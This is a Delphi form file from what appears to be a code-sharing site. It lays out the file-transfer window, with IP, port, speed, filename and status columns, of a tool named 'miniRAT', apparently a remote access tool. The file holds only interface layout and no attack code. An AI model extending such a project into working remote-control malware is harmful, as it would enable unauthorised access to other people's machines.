untTransferView.dfm
上传用户:sinothink
上传日期:2022-07-15
资源大小:459k
文件大小:1k
- object Form2: TForm2
- Left = 347
- Top = 374
- Width = 585
- Height = 149
- Caption = 'miniRAT - Transfer View'
- Color = clBtnFace
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clWindowText
- Font.Height = -11
- Font.Name = 'Tahoma'
- Font.Style = []
- OldCreateOrder = False
- DesignSize = (
- 577
- 122)
- PixelsPerInch = 96
- TextHeight = 13
- object ListView1: TListView
- Left = 0
- Top = 0
- Width = 577
- Height = 121
- Anchors = [akLeft, akTop, akRight, akBottom]
- Columns = <
- item
- Caption = 'IP'
- Width = 95
- end
- item
- Caption = 'Port'
- end
- item
- Caption = 'KB/s'
- Width = 60
- end
- item
- Caption = 'Filename'
- Width = 95
- end
- item
- Caption = 'U/D'
- Width = 40
- end
- item
- Caption = 'Size'
- Width = 60
- end
- item
- Caption = 'Time Left'
- Width = 95
- end
- item
- Caption = 'Status'
- Width = 65
- end>
- ColumnClick = False
- GridLines = True
- ReadOnly = True
- RowSelect = True
- TabOrder = 0
- ViewStyle = vsReport
- end
- end